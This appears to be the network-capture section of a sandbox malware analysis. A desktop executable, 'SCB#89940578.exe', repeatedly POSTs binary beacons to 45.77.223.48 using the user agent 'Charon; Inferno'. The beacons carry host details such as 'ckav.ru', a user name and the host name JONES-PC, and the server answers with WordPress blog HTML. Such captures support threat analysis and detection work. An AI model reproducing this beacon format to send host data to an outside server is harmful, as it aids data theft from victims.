                                            Apr 26, 2024 04:42:12.565965891 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:12.752552986 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:13.653037071 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:12 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:13.653060913 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:13.653183937 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:13.661458969 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:13.661822081 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:13.661916018 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:13.662199020 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:13.662368059 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:13.662462950 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:13.662504911 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.44974445.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:14.041821003 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:14.229063988 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:15.182286024 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:14 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:15.182529926 CEST64INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8
                                            Apr 26, 2024 04:42:15.182548046 CEST77INData Raw: 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: " /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:15.204698086 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:15.205224991 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:15.205243111 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:15.205295086 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:15.205383062 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:15.205466986 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:15.205483913 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.44974545.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:15.814851046 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:16.005577087 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:16.929127932 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:15 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:16.929332018 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:16.929466963 CEST11INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09
                                            Data Ascii: UTF-8" />
                                            Apr 26, 2024 04:42:16.929522991 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:16.939404964 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:16.939680099 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:16.939841986 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:16.939990997 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:16.940095901 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:16.940192938 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.44974745.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:17.251353025 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:17.439920902 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:18.335382938 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:17 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:18.335608959 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:18.335690022 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:18.344870090 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:18.344933987 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:18.345019102 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:18.345182896 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:18.345417976 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:18.345484018 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:42:18.522166967 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.44975045.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:18.687769890 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:18.879486084 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:19.788387060 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:18 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:19.788469076 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:19.788588047 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:19.797753096 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:19.798095942 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:19.798274040 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:19.798572063 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:19.798681974 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
